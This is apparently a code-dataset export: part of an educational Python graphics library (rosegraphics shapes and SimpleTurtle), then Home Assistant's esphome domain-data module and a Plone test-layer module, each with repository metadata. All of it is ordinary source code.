return [self.get_upper_left_corner().x,
self.get_upper_left_corner().y,
self.get_lower_right_corner().x,
self.get_lower_right_corner().y]
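# Illustrative example of the corner normalization above (arbitrary values):
# a _RectangularShape built from Point(300, 50) and Point(100, 200) returns
# _get_coordinates_for_drawing() == [100, 50, 300, 200], i.e. upper-left
# corner first and lower-right corner second, no matter which two opposite
# corners were passed to the constructor.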
class Arc(_RectangularShape, _ShapeWithOutline):
""" Not yet implemented. """
class Bitmap(_Shape):
""" Not yet implemented. """
class Circle(_ShapeWithCenter, _ShapeWithOutline):
"""
A Shape that is a circle.
To construct a Circle, use:
- rg.Circle(center, radius)
where center is an rg.Point object
and radius is a positive integer.
For example:
- rg.Circle(rg.Point(100, 75), 30)
specifies the circle whose center
is at (100, 75) and whose radius is 30.
Instance variables include:
center: An rg.Point that specifies
the center of the Circle.
radius: The radius of the Circle.
fill_color:
The Circle is filled with this color.
Example: circle.fill_color = 'green'
outline_color:
The outline of the Circle is this color.
Example: circle.outline_color = 'blue'
outline_thickness: The thickness (in pixels)
of the outline of the Circle.
Examples:
circle = rg.Circle(rg.Point(100, 75), 30)
print(circle.center, circle.radius)
circle.fill_color = 'blue'
circle.outline_color = 'black'
circle.outline_thickness = 5
window = rg.RoseWindow()
circle.attach_to(window)
circle.move_center_to(300, 200)
circle.move_by(-50, 60)
# Another way to move the Circle:
x = circle.center.x
y = circle.center.y
circle.center = rg.Point(x - 50, y + 60)
"""
def __init__(self, center, radius):
"""
:type center: rg.Point
:type radius: int
"""
# The following sets instance variable
# self.center
# to a clone (copy) of the given rg.Point.
super().__init__(center, tkinter.Canvas.create_oval)
# The following sets default values for:
# self.fill_color
# self.outline_color
# self.outline_thickness
super()._initialize_options()
# The radius is also stored in an instance variable:
self.radius = radius
def __repr__(self):
""" Returns a string representation of this Circle. """
f_string = ''
f_string += 'Circle: center=({}, {}), radius={}, fill_color={}, '
f_string += 'outline_color={}, outline_thickness={}.'
return f_string.format(self.center.x, self.center.y,
self.radius,
self.fill_color, self.outline_color,
self.outline_thickness)
def clone(self):
""" Returns a copy of this Circle. """
return Circle(self.center, self.radius)
def get_bounding_box(self):
"""
Returns an rg.Rectangle that encloses this Circle.
"""
c1 = Point(self.center.x - self.radius,
self.center.y - self.radius)
c2 = Point(self.center.x + self.radius,
self.center.y + self.radius)
return Rectangle(c1, c2)
def _get_coordinates_for_drawing(self):
return self.get_bounding_box()._get_coordinates_for_drawing()
class Ellipse(_RectangularShape, _ShapeWithOutline):
"""
A Shape that is an ellipse (aka oval).
To construct an Ellipse, use:
- rg.Ellipse(corner1, corner2)
where corner1 and corner2 are
rg.Point objects that specify opposite
corners of the imaginary rectangle that
encloses the Ellipse.
For example:
- rg.Ellipse(rg.Point(100, 50),
- rg.Point(300, 200))
specifies the ellipse whose enclosing
imaginary rectangle:
- has upper-left corner (100, 50) and
- lower-right corner (300, 200).
Another example:
- rg.Ellipse(rg.Point(300, 50),
- rg.Point(100, 200))
specifies the same ellipse.
Any two opposite corners can be used.
Instance variables include:
corner_1: An rg.Point that specifies
one corner of the imaginary rectangle
that encloses the Ellipse.
corner_2: An rg.Point that specifies an
opposite corner of the imaginary rectangle
that encloses the Ellipse.
fill_color:
The Ellipse is filled with this color.
Example: ellipse.fill_color = 'green'
outline_color:
The outline of the Ellipse is this color.
Example: ellipse.outline_color = 'blue'
outline_thickness: The thickness (in pixels)
of the outline of the Ellipse.
Examples:
p1 = rg.Point(100, 50)
p2 = rg.Point(300, 200)
ellipse = rg.Ellipse(p1, p2)
print(ellipse.corner_1, ellipse.corner_2)
ellipse.fill_color = 'blue'
ellipse.outline_color = 'black'
ellipse.outline_thickness = 5
window = rg.RoseWindow()
ellipse.attach_to(window)
ellipse.move_by(-50, 60)
# Another way to move the Ellipse:
ellipse.corner_1.move_by(-50, 60)
ellipse.corner_2.move_by(-50, 60)
# To get rg.Points for the corners/center:
ul = ellipse.get_upper_left_corner()
ur = ellipse.get_upper_right_corner()
ll = ellipse.get_lower_left_corner()
lr = ellipse.get_lower_right_corner()
center = ellipse.get_center()
# To get the width/height (always positive):
h = ellipse.get_height()
w = ellipse.get_width()
"""
def __init__(self, corner_1, corner_2):
"""
:type corner_1: rg.Point
:type corner_2: rg.Point
"""
# The following sets instance variables
# self.corner_1
# self.corner_2
# to clones (copies) of the given rg.Points.
super().__init__(corner_1, corner_2,
tkinter.Canvas.create_oval)
# The following sets default values for:
# self.fill_color
# self.outline_color
# self.outline_thickness
super()._initialize_options()
class Line(_Shape, _ShapeWithThickness):
"""
A Shape that is a line segment.
To construct a Line, use:
- rg.Line(start, end)
where start and end are rg.Point objects
that specify the endpoints of the Line.
For example:
- rg.Line(rg.Point(100, 50),
- rg.Point(200, 30))
specifies the Line that starts at (100, 50)
and ends at (200, 30).
Another example:
- rg.Line(rg.Point(200, 30),
- rg.Point(100, 50))
specifies the Line that is the same as the
previous example except that the start and
end points are reversed. This is important
if the Line's "arrow" type is not None.
Instance variables include:
start:
The rg.Point that is one end of the Line.
end:
The rg.Point that is the other end of the Line.
color: The Line is drawn with this color.
thickness: The thickness (in pixels) of the Line.
arrow: Specifies whether or not the Line
is drawn as an arrow. Possible values are:
- None draw the Line without arrow-heads
- 'first' draw an arrow-head at the start
- 'last' draw an arrow-head at the end
- 'both' draw an arrow-head at both
For example, if my_line is a Line, then
- my_line.arrow = 'last'
makes the Line be drawn as an arrow
from its start point to its end point.
Examples:
start = rg.Point(100, 50)
end = rg.Point(200, 30)
line = rg.Line(start, end)
line.color = 'blue'
line.thickness = 3
line.arrow = 'both' # A double-sided arrow
line.arrow = None # Just a line (no arrow)
line.arrow = 'first' # Arrow from end to start
line.arrow = 'last' # Arrow from start to end
window = rg.RoseWindow()
line.attach_to(window)
line.move_by(-50, 60)
"""
def __init__(self, start, end):
"""
:type start: rg.Point
:type end: rg.Point
"""
super().__init__(tkinter.Canvas.create_line)
# The following sets default values for:
# self.color
# self.thickness
# self.arrow
super()._initialize_options()
# The other instance variables are the endpoints:
self.start = start.clone()
self.end = end.clone()
def __repr__(self):
""" Returns a string representation of this Line. """
f_string = ''
f_string += 'Line: start=({}, {}), end=({}, {}), color={}, '
f_string += 'thickness={}, arrow={}.'
return f_string.format(self.start.x, self.start.y,
self.end.x, self.end.y,
self.color, self.thickness, self.arrow)
def clone(self):
""" Returns a copy of this Line. """
return Line(self.start, self.end)
def move_by(self, dx, dy):
"""
Moves both endpoints of this Line
(and hence the entire Line as well)
to the right by dx and down by dy.
Negative values move it to the left/up instead.
Does NOT return a value; instead, it mutates this Line.
:type dx: float
:type dy: float
"""
self.start.move_by(dx, dy)
self.end.move_by(dx, dy)
def get_midpoint(self):
"""
Returns an rg.Point at the midpoint (center) of this Line.
"""
return Point((self.start.x + self.end.x) / 2,
(self.start.y + self.end.y) / 2)
def _get_coordinates_for_drawing(self):
return [self.start.x,
self.start.y,
self.end.x,
self.end.y]
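# Small worked example (values chosen for illustration):
#     line = Line(Point(0, 0), Point(10, 20))
#     line.get_midpoint()                  # Point(5.0, 10.0)
#     line._get_coordinates_for_drawing()  # [0, 0, 10, 20]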
class Path(_Shape, _ShapeWithThickness):
""" Not yet implemented. """
class Point(_Shape, _ShapeWithOutline):
"""
A Shape that is a point in two-dimensional space.
It is drawn as a small circle (dot).
To construct a Point, use:
- rg.Point(x, y)
where x and y are the Point's coordinates.
For example:
- rg.Point(100, 50)
specifies the point whose x value is 100
and whose y value is 50.
Instance variables include the following:
x: The x-coordinate of the Point.
y: The y-coordinate of the Point.
fill_color:
The Point is filled with this color.
Note that a Point is drawn as a small, filled
circle, which is why it has a fill_color, etc.
Example: p.fill_color = 'green'
outline_color:
The outline of the Point is this color.
Example: p.outline_color = 'blue'
outline_thickness: The thickness (in pixels)
of the outline of the Point.
Examples:
p = rg.Point(100, 50)
print(p.x, p.y)
window = rg.RoseWindow()
p.attach_to(window)
p.move_to(300, 200)
p.move_by(-50, 60)
# Another way to move the Point:
p.x = p.x - 50
p.y = p.y + 60
p.fill_color = 'blue'
p.outline_color = 'black'
p.outline_thickness = 1
"""
defaults = {'width_for_drawing': 5,
'height_for_drawing': 5,
'fill_color': 'black',
'outline_color': 'black',
'outline_thickness': 1}
def __init__(self, x, y):
"""
:type x: float
:type y: float
"""
super().__init__(tkinter.Canvas.create_oval)
self.fill_color = Point.defaults['fill_color']
self.outline_color = Point.defaults['outline_color']
self.outline_thickness = Point.defaults['outline_thickness']
self.x = x
self.y = y
self.width_for_drawing = Point.defaults['width_for_drawing']
self.height_for_drawing = Point.defaults['height_for_drawing']
def __repr__(self):
""" Returns a string representation of this Point. """
return 'Point({:.1f}, {:.1f})'.format(self.x, self.y)
def clone(self):
""" Returns a copy of this Point. """
return Point(self.x, self.y)
def move_by(self, dx, dy):
"""
Moves this Point to the right by dx and down by dy.
Negative values move it to the left/up instead.
Does NOT return a value; instead, it mutates this Point.
:type dx: float
:type dy: float
"""
self.x = self.x + dx
self.y = self.y + dy
def move_to(self, x, y):
"""
Moves this Point to (x, y).
Does NOT return a value; instead, it mutates this Point.
:type x: float
:type y: float
"""
self.x = x
self.y = y
def get_bounding_box(self):
"""
Returns an rg.Rectangle that encloses
this Point (viewing it as a dot).
"""
c1 = Point(self.x - self.width_for_drawing / 2,
self.y - self.height_for_drawing / 2)
c2 = Point(self.x + self.width_for_drawing / 2,
self.y + self.height_for_drawing / 2)
return Rectangle(c1, c2)
def _get_coordinates_for_drawing(self):
return self.get_bounding_box()._get_coordinates_for_drawing()
class Polygon(_Shape, _ShapeWithOutline):
""" Not yet implemented. """
class Rectangle(_RectangularShape, _ShapeWithOutline):
"""
A Shape that is a rectangle.
To construct a Rectangle, use:
- rg.Rectangle(corner1, corner2)
where corner1 and corner2 are
rg.Point objects that specify opposite
corners of the rectangle.
For example:
- rg.Rectangle(rg.Point(100, 50),
- rg.Point(300, 200))
specifies the rectangle:
- whose upper-left corner is (100, 50) and
- whose lower-right corner is (300, 200).
Another example:
- rg.Rectangle(rg.Point(300, 50),
- rg.Point(100, 200))
specifies the same rectangle.
Any two opposite corners can be used.
Instance variables include:
corner_1: An rg.Point that specifies
one corner of the Rectangle.
corner_2: An rg.Point that specifies
an opposite corner of the Rectangle.
fill_color:
The Rectangle is filled with this color.
Example: rect.fill_color = 'green'
outline_color:
The outline of the Rectangle is this color.
Example: rect.outline_color = 'blue'
outline_thickness: The thickness (in pixels)
of the outline of the Rectangle.
Examples:
p1 = rg.Point(100, 50)
p2 = rg.Point(300, 200)
rect = rg.Rectangle(p1, p2)
print(rect.corner_1, rect.corner_2)
rect.fill_color = 'blue'
rect.outline_color = 'black'
rect.outline_thickness = 5
window = rg.RoseWindow()
rect.attach_to(window)
rect.move_by(-50, 60)
# Another way to move the Rectangle:
rect.corner_1.move_by(-50, 60)
rect.corner_2.move_by(-50, 60)
# To get rg.Points for the corners/center:
ul = rect.get_upper_left_corner()
ur = rect.get_upper_right_corner()
ll = rect.get_lower_left_corner()
lr = rect.get_lower_right_corner()
center = rect.get_center()
# To get the width/height (always positive):
h = rect.get_height()
w = rect.get_width()
"""
def __init__(self, corner_1, corner_2):
"""
:type corner_1: rg.Point
:type corner_2: rg.Point
"""
# The following sets instance variables
# self.corner_1
# self.corner_2
# to clones (copies) of the given rg.Points.
super().__init__(corner_1, corner_2,
tkinter.Canvas.create_rectangle)
# The following sets default values for:
# self.fill_color
# self.outline_color
# self.outline_thickness
super()._initialize_options()
def get_bounding_box(self):
"""
Returns a new rg.Rectangle with the same corners as this one.
"""
return self.clone()
class RoundedRectangle(_RectangularShape, _ShapeWithOutline):
""" Not yet implemented. """
class Square(_ShapeWithCenter, _ShapeWithOutline):
"""
A Shape that is a square.
To construct a Square, use:
- rg.Square(center, length_of_each_side)
where center is an rg.Point object
and length_of_each_side is a positive integer.
For example:
- rg.Square(rg.Point(100, 75), 60)
specifies the square whose center
is at (100, 75) and whose length of
each side is 60. Its corners are at:
(70, 45), (130, 45), (70, 105), (130, 105).
Instance variables include:
center: An rg.Point that specifies
the center of the Square.
length_of_each_side: The length of each side of the Square.
fill_color:
The Square is filled with this color.
Example: square.fill_color = 'green'
outline_color:
The outline of the Square is this color.
Example: square.outline_color = 'blue'
outline_thickness: The thickness (in pixels)
of the outline of the Square.
Examples:
square = rg.Square(rg.Point(100, 75), 60)
print(square.center, square.length_of_each_side)
square.fill_color = 'blue'
square.outline_color = 'black'
square.outline_thickness = 5
window = rg.RoseWindow()
square.attach_to(window)
square.move_center_to(300, 200)
square.move_by(-50, 60)
# Another way to move the Square:
x = square.center.x
y = square.center.y
square.center = rg.Point(x - 50, y + 60)
"""
def __init__(self, center, length_of_each_side):
"""
:type center: rg.Point
:type length_of_each_side: int
"""
# The following sets instance variable
# self.center
# to a clone (copy) of the given rg.Point.
super().__init__(center, tkinter.Canvas.create_rectangle)
# The following sets default values for:
# self.fill_color
# self.outline_color
# self.outline_thickness
super()._initialize_options()
# The length of each side is also stored in an instance variable
self.length_of_each_side = length_of_each_side
def __repr__(self):
""" Returns a string representation of this Square. """
f_string = ''
f_string += 'Square: center=({}, {}), side-lengths={}, '
f_string += 'fill_color={}, outline_color={}, outline_thickness={}.'
return f_string.format(self.center.x, self.center.y,
self.length_of_each_side,
self.fill_color, self.outline_color,
self.outline_thickness)
def clone(self):
""" Returns a copy of this Square. """
return Square(self.center, self.length_of_each_side)
def get_bounding_box(self):
"""
Returns an rg.Rectangle with the same corners as this Square.
"""
c1 = Point(self.center.x - self.length_of_each_side / 2,
self.center.y - self.length_of_each_side / 2)
c2 = Point(self.center.x + self.length_of_each_side / 2,
self.center.y + self.length_of_each_side / 2)
return Rectangle(c1, c2)
def _get_coordinates_for_drawing(self):
return self.get_bounding_box()._get_coordinates_for_drawing()
class Text(_ShapeWithCenter, _ShapeWithText):
"""
A Shape that has a string of text on it, displayed horizontally.
Its constructor specifies the rg.Point at which the text
is centered and the string that is to be displayed.
Public data attributes: center (an rg.Point),
font_size (an integer, 5 to 80 or so are reasonable values),
is_bold (True if the text is to be displayed in BOLD, else False),
is_italic (True or False),
is_underline (True or False),
is_overstrike (True or False),
text_color (color used to display the text, default is 'black')
text (the string to be displayed).
Public methods: attach_to, move_by, move_center_to.
"""
def __init__(self, center, text):
"""
The first argument must be an rg.Point.
The second argument must be a string.
When this Text object is rendered on a window,
the string (2nd argument) is drawn horizontally on the window,
centered at the rg.Point that is the 1st argument.
Preconditions:
:type center: rg.Point
:type text: str
"""
super().__init__(center, tkinter.Canvas.create_text)
super()._initialize_options()
self.text = text
# FIXME: Allow __init__ to set the options.
def __repr__(self):
return "Text displaying '{}' at position {}".format(self.text,
self.center)
# FIXME: Have repr include characteristics??
# FIXME: Do a clone?
# def clone(self):
# return Square(self.center, self.length_of_each_side)
# def get_bounding_box(self):
# return Rectangle(self.center,
# 2 * self.length_of_each_side,
# 2 * self.length_of_each_side)
# FIXME: Implement bounding_box using the tkinter function for it.
def _get_coordinates_for_drawing(self):
return [self.center.x, self.center.y]
# Mark: Window/RoseWindow naming collision is causing mass confusion.
# class Window(_Shape):
# """ Not yet implemented. """
# default_options = {}
# CONSIDER: Are these right for here?
class Button(_Shape):
""" Not yet implemented. """
default_options = {}
class Entry(_Shape):
""" Not yet implemented. """
default_options = {}
class Color(object):
"""
A Color represents a fill or outline color created from custom
amounts of red, green, and blue light. The arguments are:
- The RED component (0-255),
- the GREEN component (0-255),
- the BLUE component (0-255).
This Color can be passed to RoseGraphics colors
such as fill_color and outline_color.
"""
def __init__(self, red, green, blue):
self.red = red
self.green = green
self.blue = blue
def __repr__(self):
return "#{:02x}{:02x}{:02x}".format(self.red, self.green, self.blue)
# begin STUB code for testing
class _RoseWindowStub(RoseWindow):
def __init__(self, width=400, height=300, title='Rose Graphics',
color='black', canvas_color=None,
make_initial_canvas=True):
canvas_color = "white" # FIXME
self._is_closed = False
self.width = width
self.height = height
self.initial_canvas = _RoseCanvasStub(
self, width, height, canvas_color)
def render(self, seconds_to_pause=None):
pass
def get_next_mouse_click(self):
return Point(0, 0)
def close_on_mouse_click(self):
return None
def continue_on_mouse_click(self,
message='To continue, click anywhere in this window',
x_position=None,
y_position=None,
close_it=False,
erase_it=True):
return None
def _serialize_shapes(self):
"""Returns a list of strings representing the shapes in sorted order."""
return _serialize_shapes(self)
class _RoseCanvasStub(RoseCanvas):
def __init__(self, window, width, height, canvas_color):
# super().__init__(window, width, height, canvas_color)
# canvases.append(self)
self.shapes = []
def _draw(self, shape):
# super()._draw(shape)
self.shapes.append(shape)
def render(self, seconds_to_pause=None):
# super().render() # don't pause
pass
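# These stubs let tests exercise drawing code without opening real tkinter
# windows. A minimal sketch:
#     window = _RoseWindowStub()
#     Circle(Point(10, 10), 5).attach_to(window)
#     window.initial_canvas.shapes   # now holds the attached Circle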
class TurtleWindow(object):
def __init__(self):
self._screen = turtle.Screen()
turtle.Turtle._screen = self._screen
def close_on_mouse_click(self):
self._screen.exitonclick()
# We may need the statement:
# turtle.TurtleScreen._RUNNING = True
# in case we open a subsequent TurtleWindow during this run.
# The turtle library seems not to allow for that possibility
# (it uses a CLASS variable _RUNNING where I would have expected
# an INSTANCE variable).
# The next statement appeared to have a visible effect
# (something flashed) but nothing worse. At this time
# it is commented-out, since we need only a single TurtleWindow.
# turtle.TurtleScreen._RUNNING = True
def delay(self, milliseconds=None):
self._screen.delay(milliseconds)
def tracer(self, n=None, delay=None):
self._screen.tracer(n, delay)
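# Minimal usage sketch (assumes the standard turtle module is available):
#     window = TurtleWindow()
#     window.tracer(2, 25)   # redraw every 2nd update, with a 25 ms delay
#     # ... turtle drawing here ...
#     window.close_on_mouse_click()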
class ShapesWindow(RoseWindow):
pass
class SimpleTurtle(object):
"""
A SimpleTurtle is a Turtle with restricted (simpler) functionality.
It can move forward/backward (units are pixels), turn (spin)
left/right (units are degrees), and more.
To construct a SimpleTurtle, use:
rg.SimpleTurtle(shape)
where shape is OPTIONAL and can be any of: 'turtle'
'arrow' 'classic' 'square' 'circle' 'triangle' 'blank'
Instance variables include:
speed: An integer from 1 (slowest) to 10 (fastest) that
determines how fast the SimpleTurtle moves.
pen: an rg.Pen object (see example below) that determines
the color and thickness of the line
that the SimpleTurtle draws when moving
paint_bucket: an rg.PaintBucket object (see example below)
that determines the color with which the SimpleTurtle
"fills" shapes indicated by using the begin_fill and
end_fill methods.
Examples:
natacha = rg.SimpleTurtle()
natacha.forward(100)
boris = rg.SimpleTurtle('turtle')
boris.speed = 8
boris.pen = rg.Pen('blue', 5) # blue line 5 pixels thick
boris.paint_bucket = rg.PaintBucket('red')
# Moves with pen down, then with pen up, then with pen down again:
boris.left(90)
boris.forward(-300)
boris.pen_up()
boris.go_to(rg.Point(100, -50))
boris.pen_down()
boris.backward(75)
# Moves with the enclosed space "filled" with the paint_bucket
boris.begin_fill()
... movements ...
boris.end_fill()
"""
def __init__(self, shape='classic'):
"""
What comes in:
A string that selects the shape used to draw this SimpleTurtle.
Defaults to 'classic', the arrowhead shape from early Turtle Graphics.
Side effects: Constructs and stores in self._turtle the "real" Turtle
to do all the work on behalf of this SimpleTurtle. This (purposely)
restricts what this SimpleTurtle knows and can do.
:type shape: str
"""
self.speed = 1
self.pen = Pen('black', 1)
self.paint_bucket = PaintBucket('black')
self._turtle = turtle.Turtle(shape)
self._update_real_turtle()
def forward(self, distance):
"""
Makes this SimpleTurtle go forward the given distance
(in pixels). Example (assuming sally is an rg.SimpleTurtle):
sally.forward(200)
"""
self._update_real_turtle()
self._turtle.forward(distance)
def backward(self, distance):
"""
Makes this SimpleTurtle go backward the given distance
(in pixels). Example (assuming sally is an rg.SimpleTurtle):
sally.backward(200)
"""
self._update_real_turtle()
self._turtle.backward(distance)
def left(self, angle):
"""
Makes this SimpleTurtle turn (i.e. spin) left by the given angle
(in degrees). Example (assuming sally is an rg.SimpleTurtle):
sally.left(45)
"""
self._update_real_turtle()
self._turtle.left(angle)
def right(self, angle):
"""
Makes this SimpleTurtle turn (i.e. spin) right by the given angle
(in degrees). Example (assuming sally is an rg.SimpleTurtle):
sally.right(45)
"""
self._update_real_turtle()
self._turtle.right(angle)
def go_to(self, point):
"""
Makes this SimpleTurtle go to the given rg.Point.
(0, 0) is at the center of the window.
Example (assuming sally is an rg.SimpleTurtle):
sally.go_to(rg.Point(100, -50))
"""
self._update_real_turtle()
self._turtle.goto(point.x, point.y)
def draw_circle(self, radius):
"""
Makes this SimpleTurtle draw a circle with the given radius.
Example (assuming sally is an rg.SimpleTurtle):
sally.draw_circle(40)
"""
self._update_real_turtle()
self._turtle.circle(radius)
def draw_square(self, length_of_sides):
"""
Makes this SimpleTurtle draw a square with the given value
for the length of each of its sides.
Example (assuming sally is an rg.SimpleTurtle):
sally.draw_square(100)
"""
for _ in range(4):
self.forward(length_of_sides)
self.left(90)
def draw_regular_polygon(self, number_of_sides, length_of_sides):
"""
Makes this SimpleTurtle draw a regular polygon with the given
number of sides and the given length for each of its sides.
Example (assuming sally is an rg.SimpleTurtle):
sally.draw_regular_polygon(8, 75) # octagon
sally.draw_regular_polygon(3, 75) # triangle
"""
for _ in range(number_of_sides):
self.forward(length_of_sides)
self.left(360 / number_of_sides)
def pen_up(self):
"""
Lifts up this SimpleTurtle's pen. Subsequent movements
will NOT draw a line (until pen_down is called).
Example (assuming sally is an rg.SimpleTurtle):
sally.pen_up()
"""
self._update_real_turtle()
self._turtle.penup()
def pen_down(self):
"""
Puts down this SimpleTurtle's pen. Subsequent movements
WILL draw a line using this SimpleTurtle's pen (until pen_up
is called). Example (assuming sally is an rg.SimpleTurtle):
sally.pen_down()
"""
self._update_real_turtle()
self._turtle.pendown()
def x_cor(self):
"""
Returns the x-coordinate of this SimpleTurtle's current position.
Example (assuming sally is an rg.SimpleTurtle):
x = sally.x_cor()
"""
return self._turtle.xcor()
def y_cor(self):
"""
Returns the y-coordinate of this SimpleTurtle's current position.
Example (assuming sally is an rg.SimpleTurtle):
y = sally.y_cor()
"""
return self._turtle.ycor()
def begin_fill(self):
"""
Begins "filling" the shape that this SimpleTurtle draws,
using this SimpleTurtle's paint_bucket as the fill.
Example (assuming sally is an rg.SimpleTurtle) that fills
a triangle with green:
sally.paint_bucket = rg.PaintBucket('green')
sally.begin_fill()
sally.forward(100)
sally.left(120)
sally.forward(100)
sally.left(120)
sally.forward(100)
sally.end_fill()
"""
self._update_real_turtle()
self._turtle.begin_fill()
def end_fill(self):
"""
Completes "filling" the shape that this SimpleTurtle draws,
using this SimpleTurtle's paint_bucket as the fill.
Example (assuming sally is an rg.SimpleTurtle) that fills
a triangle with green:
sally.paint_bucket = rg.PaintBucket('green')
sally.begin_fill()
sally.forward(100)
sally.left(120)
sally.forward(100)
sally.left(120)
sally.forward(100)
sally.end_fill()
"""
self._update_real_turtle()
self._turtle.end_fill()
def clear(self):
""" Not yet implemented. """
def clone(self):
""" Not yet implemented. """
pass
def write_text(self):
""" Not yet implemented. """
pass
def _update_real_turtle(self):
self._turtle.pencolor(self.pen.color)
self._turtle.pensize(self.pen.thickness)
self._turtle.fillcolor(self.paint_bucket.color)
self._turtle.speed(self.speed)
class Pen(object):
"""
A Pen has a color and thickness.
SimpleTurtles use a Pen for drawing lines.
To construct a Pen, use:
rg.Pen(color, thickness)
where color is a color (e.g. 'red')
and thickness is a small positive integer.
Instance variables are:
color: The color of the Pen
thickness: The thickness of the Pen
Examples:
thick_blue = rg.Pen('blue', 14)
thin_red = rg.Pen('red', 1)
"""
def __init__(self, color, thickness):
self.thickness = thickness
self.color = color
class PaintBucket(object):
"""
A PaintBucket has a color.
SimpleTurtles use a PaintBucket for filling shapes with color.
To construct a PaintBucket, use:
rg.PaintBucket(color)
where color is a color (e.g. 'red').
Instance variables are:
color: The color of the PaintBucket
Example:
paint = rg.PaintBucket('green')
"""
def __init__(self, color):
self.color = color
| [
"[email protected]"
] | |
482928edaa2e06cd3b7bed4f4eaec7daf1bdda60 | 2c74bb301f1ed83b79254944183ac5a18a639fdf | /homeassistant/components/esphome/domain_data.py | 01f0a4d6b1369b6f6908d943c821bb3805e59e57 | [
"Apache-2.0"
] | permissive | Adminiuga/home-assistant | 5bec93007ddac1a268cc359bf7e48530c5f73b38 | dcf68d768e4f628d038f1fdd6e40bad713fbc222 | refs/heads/dev | 2023-02-22T22:03:31.013931 | 2022-11-09T00:27:20 | 2022-11-09T00:27:20 | 123,929,062 | 5 | 4 | Apache-2.0 | 2023-02-22T06:14:31 | 2018-03-05T14:11:09 | Python | UTF-8 | Python | false | false | 2,885 | py | """Support for esphome domain data."""
from __future__ import annotations
from dataclasses import dataclass, field
from typing import TypeVar, cast
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
from homeassistant.helpers.json import JSONEncoder
from homeassistant.helpers.storage import Store
from .entry_data import RuntimeEntryData
STORAGE_VERSION = 1
DOMAIN = "esphome"
_DomainDataSelfT = TypeVar("_DomainDataSelfT", bound="DomainData")
@dataclass
class DomainData:
"""Define a class that stores global esphome data in hass.data[DOMAIN]."""
_entry_datas: dict[str, RuntimeEntryData] = field(default_factory=dict)
_stores: dict[str, Store] = field(default_factory=dict)
_entry_by_unique_id: dict[str, ConfigEntry] = field(default_factory=dict)
def get_by_unique_id(self, unique_id: str) -> ConfigEntry:
"""Get the config entry by its unique ID."""
return self._entry_by_unique_id[unique_id]
def get_entry_data(self, entry: ConfigEntry) -> RuntimeEntryData:
"""Return the runtime entry data associated with this config entry.
Raises KeyError if the entry isn't loaded yet.
"""
return self._entry_datas[entry.entry_id]
def set_entry_data(self, entry: ConfigEntry, entry_data: RuntimeEntryData) -> None:
"""Set the runtime entry data associated with this config entry."""
if entry.entry_id in self._entry_datas:
raise ValueError("Entry data for this entry is already set")
self._entry_datas[entry.entry_id] = entry_data
if entry.unique_id:
self._entry_by_unique_id[entry.unique_id] = entry
def pop_entry_data(self, entry: ConfigEntry) -> RuntimeEntryData:
"""Pop the runtime entry data instance associated with this config entry."""
if entry.unique_id:
del self._entry_by_unique_id[entry.unique_id]
return self._entry_datas.pop(entry.entry_id)
def is_entry_loaded(self, entry: ConfigEntry) -> bool:
"""Check whether the given entry is loaded."""
return entry.entry_id in self._entry_datas
def get_or_create_store(self, hass: HomeAssistant, entry: ConfigEntry) -> Store:
"""Get or create a Store instance for the given config entry."""
return self._stores.setdefault(
entry.entry_id,
Store(
hass, STORAGE_VERSION, f"esphome.{entry.entry_id}", encoder=JSONEncoder
),
)
@classmethod
def get(cls: type[_DomainDataSelfT], hass: HomeAssistant) -> _DomainDataSelfT:
"""Get the global DomainData instance stored in hass.data."""
# Don't use setdefault - this is a hot code path
if DOMAIN in hass.data:
return cast(_DomainDataSelfT, hass.data[DOMAIN])
ret = hass.data[DOMAIN] = cls()
return ret
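# Usage sketch (hass, entry and the RuntimeEntryData value are assumed to
# come from a running Home Assistant instance; names are illustrative):
#     domain_data = DomainData.get(hass)
#     domain_data.set_entry_data(entry, entry_data)
#     store = domain_data.get_or_create_store(hass, entry)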
| [
"[email protected]"
] | |
5a1ed0cd70c637628613bcdc2591471ce0eebf24 | b3c8678c1db0b3e256de97e560d7d4d26c1dd6eb | /src/jpl.mcl.site.sciencedata/src/jpl/mcl/site/sciencedata/testing.py | 4325448b2a43549da50926c2e47a4028a8f43d2d | [
"GPL-2.0-only",
"Apache-2.0",
"GPL-1.0-or-later"
] | permissive | MCLConsortium/mcl-site | e4a127235504e7ac5575ef3d73c8fd1bdf02824b | 5eb9c16a7fe322192a03461a9f22ecb8c17307fd | refs/heads/master | 2021-06-09T23:49:35.775652 | 2021-04-30T22:59:59 | 2021-04-30T22:59:59 | 49,965,919 | 1 | 0 | Apache-2.0 | 2020-08-25T15:58:27 | 2016-01-19T16:24:58 | Python | UTF-8 | Python | false | false | 1,896 | py | # encoding: utf-8
from plone.app.testing import PloneSandboxLayer, IntegrationTesting, FunctionalTesting, PLONE_FIXTURE
from . import PACKAGE_NAME
import pkg_resources, urllib2, urllib, httplib, plone.api
class TestSchemeHandler(urllib2.BaseHandler):
u'''A special URL handler for the testing-only scheme ``testscheme``.'''
def testscheme_open(self, req):
try:
selector = req.get_selector()
path = 'tests/data/' + selector.split('/')[-1] + '.json'
if pkg_resources.resource_exists(PACKAGE_NAME, path):
return urllib.addinfourl(
pkg_resources.resource_stream(PACKAGE_NAME, path),
httplib.HTTPMessage(open('/dev/null')),
req.get_full_url(),
200
)
else:
raise urllib2.URLError('Not found')
except Exception:
raise urllib2.URLError('Not found')
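# Illustrative example (URL and file name are hypothetical): once installed
# via urllib2.install_opener (see setUpZope below), opening
# 'testscheme://localhost/foo' returns the packaged resource
# tests/data/foo.json wrapped in a fake 200 response.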
class JPLMCLSiteSciencedataLayer(PloneSandboxLayer):
defaultBases = (PLONE_FIXTURE,)
def setUpZope(self, app, configurationContext):
import jpl.mcl.site.sciencedata
self.loadZCML(package=jpl.mcl.site.sciencedata)
urllib2.install_opener(urllib2.build_opener(TestSchemeHandler))
def setUpPloneSite(self, portal):
wfTool = plone.api.portal.get_tool('portal_workflow')
wfTool.setDefaultChain('plone_workflow')
self.applyProfile(portal, 'jpl.mcl.site.sciencedata:default')
JPL_MCL_SITE_SCIENCEDATA_FIXTURE = JPLMCLSiteSciencedataLayer()
JPL_MCL_SITE_SCIENCEDATA_INTEGRATION_TESTING = IntegrationTesting(
bases=(JPL_MCL_SITE_SCIENCEDATA_FIXTURE,),
name='JPLMCLSiteSciencedataLayer:IntegrationTesting'
)
JPL_MCL_SITE_SCIENCEDATA_FUNCTIONAL_TESTING = FunctionalTesting(
bases=(JPL_MCL_SITE_SCIENCEDATA_FIXTURE,),
name='JPLMCLSiteSciencedataLayer:FunctionalTesting'
)
| [
"[email protected]"
] | |
